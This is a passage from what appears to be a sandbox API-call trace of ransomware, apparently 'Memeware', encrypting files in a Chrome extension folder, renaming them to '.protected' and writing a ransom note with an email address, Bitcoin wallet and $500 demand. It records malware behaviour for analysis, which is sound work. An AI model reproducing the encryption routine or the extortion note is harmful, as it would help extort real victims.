(lpString1="craw_background.js", lpString2="Program Files") returned -1 [0080.800] lstrcmpiW (lpString1="craw_background.js", lpString2="Program Files (x86)") returned -1 [0080.800] lstrcmpiW (lpString1="craw_background.js", lpString2="$Recycle.bin") returned 1 [0080.800] lstrcmpiW (lpString1="craw_background.js", lpString2="System Volume Information") returned -1 [0080.800] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_background.js") returned 152 [0080.800] StrStrIW (lpFirst="craw_background.js", lpSrch=".protected") returned 0x0 [0080.800] lstrcmpW (lpString1="craw_background.js", lpString2="RESTORE_FILES.txt") returned -1 [0080.800] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0080.800] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0080.800] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_background.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_background.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0080.801] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_background.js") returned 152 [0080.801] StrStrW (lpFirst="craw_background.js", lpSrch=".txt") returned 0x0 [0080.801] lstrlenW 
(lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_background.js") returned 152 [0080.801] StrStrW (lpFirst="craw_background.js", lpSrch=".rar") returned 0x0 [0080.801] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_background.js") returned 152 [0080.801] StrStrW (lpFirst="craw_background.js", lpSrch=".zip") returned 0x0 [0080.801] ReadFile (in: hFile=0x160, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0080.810] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.811] WriteFile (in: hFile=0x160, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0080.811] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.811] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0080.812] WriteFile (in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0080.812] CloseHandle (hObject=0x160) returned 1 [0080.812] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_background.js.protected") returned 162 [0080.812] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_background.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_background.js"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_background.js.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_background.js.protected")) returned 1 [0080.813] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0080.813] lstrcmpiW (lpString1="craw_window.js", lpString2="Windows") returned -1 [0080.813] lstrcmpiW (lpString1="craw_window.js", lpString2="Program Files") returned -1 [0080.813] lstrcmpiW (lpString1="craw_window.js", lpString2="Program Files (x86)") returned -1 [0080.813] lstrcmpiW (lpString1="craw_window.js", lpString2="$Recycle.bin") returned 1 [0080.813] lstrcmpiW (lpString1="craw_window.js", lpString2="System Volume Information") returned -1 [0080.813] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_window.js") returned 148 [0080.813] StrStrIW (lpFirst="craw_window.js", lpSrch=".protected") returned 0x0 [0080.813] lstrcmpW (lpString1="craw_window.js", lpString2="RESTORE_FILES.txt") returned -1 [0080.813] CryptGenRandom (in: 
hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0080.813] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0080.813] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_window.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_window.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0080.814] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_window.js") returned 148 [0080.814] StrStrW (lpFirst="craw_window.js", lpSrch=".txt") returned 0x0 [0080.814] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_window.js") returned 148 [0080.814] StrStrW (lpFirst="craw_window.js", lpSrch=".rar") returned 0x0 [0080.814] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_window.js") returned 148 [0080.814] StrStrW (lpFirst="craw_window.js", lpSrch=".zip") returned 0x0 [0080.814] ReadFile (in: hFile=0x160, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0080.824] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xffffd800, 
lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.824] WriteFile (in: hFile=0x160, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0080.824] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.824] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0080.825] WriteFile (in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0080.825] CloseHandle (hObject=0x160) returned 1 [0080.830] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_window.js.protected") returned 158 [0080.830] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_window.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_window.js"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_window.js.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user 
data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_window.js.protected")) returned 1 [0080.830] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0080.830] lstrcmpiW (lpString1="css", lpString2="Windows") returned -1 [0080.830] lstrcmpiW (lpString1="css", lpString2="Program Files") returned -1 [0080.830] lstrcmpiW (lpString1="css", lpString2="Program Files (x86)") returned -1 [0080.830] lstrcmpiW (lpString1="css", lpString2="$Recycle.bin") returned 1 [0080.830] lstrcmpiW (lpString1="css", lpString2="System Volume Information") returned -1 [0080.830] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\css") returned 137 [0080.830] lstrcmpW (lpString1="css", lpString2=".") returned 1 [0080.830] lstrcmpW (lpString1="css", lpString2="..") returned 1 [0080.831] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\css\\*") returned 139 [0080.831] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\css\\*", lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 0x47bbd0 [0080.831] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.831] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.831] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.831] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.831] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.831] wnsprintfW (in: pszDest=0xcf1098, 
cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\css\\.") returned 139 [0080.831] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.831] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.831] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.831] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.831] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.831] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.831] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.831] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\css\\..") returned 140 [0080.831] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.831] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.831] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.831] lstrcmpiW (lpString1="craw_window.css", lpString2="Windows") returned -1 [0080.831] lstrcmpiW (lpString1="craw_window.css", lpString2="Program Files") returned -1 [0080.831] lstrcmpiW (lpString1="craw_window.css", lpString2="Program Files (x86)") returned -1 [0080.831] lstrcmpiW (lpString1="craw_window.css", lpString2="$Recycle.bin") returned 1 [0080.831] lstrcmpiW (lpString1="craw_window.css", lpString2="System Volume Information") returned -1 [0080.831] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\css\\craw_window.css") returned 153 [0080.831] StrStrIW (lpFirst="craw_window.css", lpSrch=".protected") returned 0x0 [0080.831] lstrcmpW (lpString1="craw_window.css", lpString2="RESTORE_FILES.txt") returned -1 [0080.831] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295db3c | out: pbBuffer=0x295db3c) returned 1 [0080.831] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295db64*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295db64*=0x30) returned 1 [0080.831] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\css\\craw_window.css" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\css\\craw_window.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.832] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\css\\craw_window.css") returned 153 [0080.832] StrStrW (lpFirst="craw_window.css", lpSrch=".txt") returned 0x0 [0080.832] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\css\\craw_window.css") returned 153 [0080.832] StrStrW (lpFirst="craw_window.css", lpSrch=".rar") returned 0x0 [0080.832] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\css\\craw_window.css") returned 153 [0080.832] StrStrW (lpFirst="craw_window.css", 
lpSrch=".zip") returned 0x0 [0080.832] ReadFile (in: hFile=0x164, lpBuffer=0xd010e0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesRead=0x295db84*=0x6cd, lpOverlapped=0x0) returned 1 [0080.844] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0xfffff933, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.844] WriteFile (in: hFile=0x164, lpBuffer=0xd010e0*, nNumberOfBytesToWrite=0x6cd, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesWritten=0x295db84*=0x6cd, lpOverlapped=0x0) returned 1 [0080.844] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.844] WriteFile (in: hFile=0x164, lpBuffer=0x295db5c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x295db5c*, lpNumberOfBytesWritten=0x295db84*=0x4, lpOverlapped=0x0) returned 1 [0080.844] WriteFile (in: hFile=0x164, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295db84*=0x30, lpOverlapped=0x0) returned 1 [0080.844] CloseHandle (hObject=0x164) returned 1 [0080.844] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\css\\craw_window.css.protected") returned 163 [0080.844] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\css\\craw_window.css" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user 
data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\css\\craw_window.css"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\css\\craw_window.css.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\css\\craw_window.css.protected")) returned 1 [0080.845] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 0 [0080.845] FindClose (in: hFindFile=0x47bbd0 | out: hFindFile=0x47bbd0) returned 1 [0080.845] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\css\\RESTORE_FILES.txt") returned 155 [0080.845] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\css\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\css\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0080.846] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.846] WriteFile (in: hFile=0x160, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295db84*=0x53d, lpOverlapped=0x0) returned 1 [0080.846] lstrlenA (lpString="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") returned 684 [0080.846] WriteFile (in: hFile=0x160, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295db84*=0x2ac, lpOverlapped=0x0) returned 1 [0080.847] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.847] WriteFile (in: hFile=0x160, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295db84*=0xb1, 
lpOverlapped=0x0) returned 1 [0080.847] CloseHandle (hObject=0x160) returned 1 [0080.847] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0080.847] lstrcmpiW (lpString1="html", lpString2="Windows") returned -1 [0080.847] lstrcmpiW (lpString1="html", lpString2="Program Files") returned -1 [0080.847] lstrcmpiW (lpString1="html", lpString2="Program Files (x86)") returned -1 [0080.847] lstrcmpiW (lpString1="html", lpString2="$Recycle.bin") returned 1 [0080.847] lstrcmpiW (lpString1="html", lpString2="System Volume Information") returned -1 [0080.847] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\html") returned 138 [0080.847] lstrcmpW (lpString1="html", lpString2=".") returned 1 [0080.847] lstrcmpW (lpString1="html", lpString2="..") returned 1 [0080.847] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\html\\*") returned 140 [0080.847] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\html\\*", lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 0x47bbd0 [0080.847] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.847] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.847] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.847] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.847] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.847] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, 
pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\html\\.") returned 140 [0080.847] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.847] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.847] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.847] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.847] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.847] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.847] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.848] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\html\\..") returned 141 [0080.848] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.848] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.848] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.848] lstrcmpiW (lpString1="craw_window.html", lpString2="Windows") returned -1 [0080.848] lstrcmpiW (lpString1="craw_window.html", lpString2="Program Files") returned -1 [0080.848] lstrcmpiW (lpString1="craw_window.html", lpString2="Program Files (x86)") returned -1 [0080.848] lstrcmpiW (lpString1="craw_window.html", lpString2="$Recycle.bin") returned 1 [0080.848] lstrcmpiW (lpString1="craw_window.html", lpString2="System Volume Information") returned -1 [0080.848] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
